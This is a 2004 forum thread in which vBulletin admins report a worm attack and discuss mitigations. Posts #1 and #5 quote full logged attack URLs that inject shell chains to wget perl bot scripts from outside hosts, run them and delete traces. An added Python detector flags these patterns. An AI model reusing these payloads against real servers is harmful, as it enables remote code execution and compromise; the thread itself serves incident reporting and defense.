  • Security Warning - How they killed my vb

    Yesterday someone started to attack my server. After some research with my webhoster it turned out that vBulletin produced the problems. Using vBulletin's logging system I could catch those two queries:

    Database error in vBulletin :

    Link-ID == false, connect failed

    mysql error:

    mysql error number: 0

    Date: Sunday 26th of December 2004 08:37:21 AM

    Script:
    Code:
    http://www.mambers.com/showthread.php?t=11270/showthread.php?amp;t=11270&goto=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111*

    Referer:

    IP Address: 202.172.227.115

    and the second one

    I am not very skilled with this, but it looks dangerous. Currently my board is down and I am not sure what I could do. I do not run any significant modifications on the board, so I guess this is a security hole in vBulletin itself.
    Any help and advice would be appreciated.

  • #2
    looks similar to mine

    http://www.vbulletin.com/forum/showthread.php?t=124241


    • #3
      You might want to edit your post and enclose the scripts in a 'code' block or something to keep it from making this page so wide.

      I've been experiencing an 'attack' for over 36 hours now. I looked at my Apache httpd log and 2 or 3 a minute are coming in from all sorts of servers from everywhere (or it's spoofing or whatever). I've seen as high as 400 requests an hour. I have done a few searches and in fact came here looking to see if this is happening to others with vBulletin.

      I'm on a dedicated server and haven't had any latency problems - and I don't typically use 10% of my bandwidth each month so it doesn't appear to be a big problem right now.

      I haven't experienced any database errors.

      I'm on FreeBSD - Don't know if that makes a difference.

      I'm assuming it's a variant of the recent phpBB Santy worm/bot (I think it's a perl script bot).

      I'm also interested in whether others are seeing this activity.

      So far I haven't seen any serious effect on my site or forum.
      Last edited by Marc Smith; Sun 26 Dec '04, 2:12am.



      • #4
        Originally posted by akonze
        Yesterday someone started to attack my server. After some research with my webhoster it turned out that vBulletin produced the problems. Using vBulletin's logging system I could catch those two queries:

        [...]

        I am not very skilled with this, but it looks dangerous. Currently my board is down and I am not sure what I could do. I do not run any significant modifications on the board, so I guess this is a security hole in vBulletin itself.
        Any help and advice would be appreciated.
        Did they damage anything except causing overload on your server?

        [Edit:] I tried to search for a similar news post in English but I can only provide a link to heise.de (German slashdot equivalent): http://www.heise.de/newsticker/meldung/54623

        However: The scripts on visualcoders.net have been removed.
        Last edited by Stadler; Sun 26 Dec '04, 2:24am.
        Hints & Tips:
        [[vB3] More Spiders / Indexers / Archives for vB3 - list]|[List of one-time-emails to ban]




        • #5
          This is an example from my Apache httpd log:
          Code:
          66.135.32.219 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/t-9142.html HTTP/1.0" 200 5353 "-" "lwp-trivial/1.41"
          66.135.32.219 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/t-9142.html/?pda=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111* HTTP/1.1" 302 0 "-" "LWP::Simple/5.803"
          66.135.32.219 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/ HTTP/1.1" 200 8591 "-" "LWP::Simple/5.803"
          This is one more example:
          Code:
          62.101.0.30 - - [26/Dec/2004:02:28:30 -0500] "GET /Forums/showthread.php?t=8514 HTTP/1.0" 200 52354 "-" "lwp-trivial/1.38"
          62.101.0.30 - - [26/Dec/2004:02:28:32 -0500] "GET /Forums/showthread.php?t=8514/index.php?s=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 52674 "-" "LWP::Simple/5.76"
          62.101.0.30 - - [26/Dec/2004:02:28:34 -0500] "GET /Forums/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19651 "-" "LWP::Simple/5.76"
          62.101.0.30 - - [26/Dec/2004:02:28:35 -0500] "GET /Forums/showthread.php?t=8514/forumdisplay.php?amp;f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;
          Last edited by Marc Smith; Sun 26 Dec '04, 2:38am.


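To turn the pattern in these log lines into something that can be run over a whole httpd log, here is an added Python example (not from this thread, vBulletin, or mod_security): it parses Apache combined-format lines, URL-decodes the request, flags entries whose query carries a cmd= parameter followed by a wget/perl command chain, and tallies the source IPs so they can feed a deny list or a filter rule. The sample lines are constructed with placeholder hosts and are not the real log entries quoted above.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache combined log: ip ident user [ts] "method url proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Indicators of the injected chain seen in the thread, checked on the decoded URL.
CMD_RE = re.compile(r'[?&]cmd=', re.I)
SHELL_TOKENS = ('cd /tmp', 'wget ', 'perl ', 'rm -rf')


def parse_line(line):
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_worm_request(entry):
    """True when the decoded URL carries cmd= plus at least two shell tokens."""
    url = unquote(entry['url'])
    if not CMD_RE.search(url):
        return False
    return sum(tok in url for tok in SHELL_TOKENS) >= 2


def scan(log_text):
    """Return (flagged entries, per-source-IP counter) for a block of log text."""
    flagged, per_ip = [], Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_worm_request(entry):
            flagged.append(entry)
            per_ip[entry['ip']] += 1
    return flagged, per_ip


# Constructed sample (placeholder hosts): a benign fetch, an injected chain, a normal view.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/t-9142.html HTTP/1.0" 200 5353 "-" "lwp-trivial/1.41"
203.0.113.5 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/t-9142.html/?pda=http://example.invalid/x.gif?&cmd=cd%20/tmp;wget%20example.invalid/a.txt;perl%20a.txt HTTP/1.1" 302 0 "-" "LWP::Simple/5.803"
198.51.100.7 - - [26/Dec/2004:02:28:34 -0500] "GET /Forums/showthread.php?t=8514 HTTP/1.0" 200 52354 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    hits, per_ip = scan(SAMPLE_LOG)
    for e in hits:
        print(e['ip'], e['ua'], unquote(e['url'])[:90])
    print("deny-list candidates:", dict(per_ip))
```

Point it at a real access_log with `scan(open(path).read())`; the per-IP counter is what you would export into an .htaccess deny list or use to judge whether a request-level filter is the better fit.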

          • #6
            Originally posted by Stadler
            However: The scripts on visualcoders.net have been removed.
            But this does not seem to remove the problem! When I route my domain to the forum again, this instantly generates a heavy load and traffic.

            And before anyone asks: the server runs php 4.3.10 already.



            • #7
              I don't think there's anything you can do to stop it, but if anyone has a way to stop it, I sure am interested. It's annoying even though it doesn't seem to be hurting anything.



              • #8
                Well, I first tried to catch all IP addresses used by the attacking bot and block them using the .htaccess file (deny from ...). But this doesn't work very well. I easily caught hundreds of IPs and after blocking them, another hundred came up.

                I now did the following: I temporarily moved everything to a new domain name and uploaded a simple index.html redirection file on the old domain.

                I guess we can't do anything until the worm is gone again...



                • #9
                  I checked IPs and they're from everywhere. Virginia, Texas, Poland, England - you name it. The Santy worm that affected phpBB was a Google issue - it used the Google search and Google shut that down. I'd like to know what this is coming from and how. It appears only a few of us here are experiencing the problem.

                  Also note in my two examples above there appear to be 2 different things attacking my site.



                  • #10
                    Perhaps filtering these requests using mod_security (www.modsecurity.org) would help a bit. At least it should be worth a try I guess.


                    • #11
                      I'm definitely not an expert at this stuff. I'll have to take a good look at modsecurity and see if it's within my expertise.



                      • #12
                        This is also happening to me; it's used 13 gig of bandwidth since yesterday. Has anyone found out how to stop it?
                        My Football Forum



                        • #13
                          I wish - Not that I've seen anywhere. Nor have I seen it mentioned on any virus / worm warning sites or such.



                          • #14
                            See http://www.vbulletin.com/forum/showthread.php?t=124159 - There are 2 fixes there, it appears.



                            • #15
                              thank you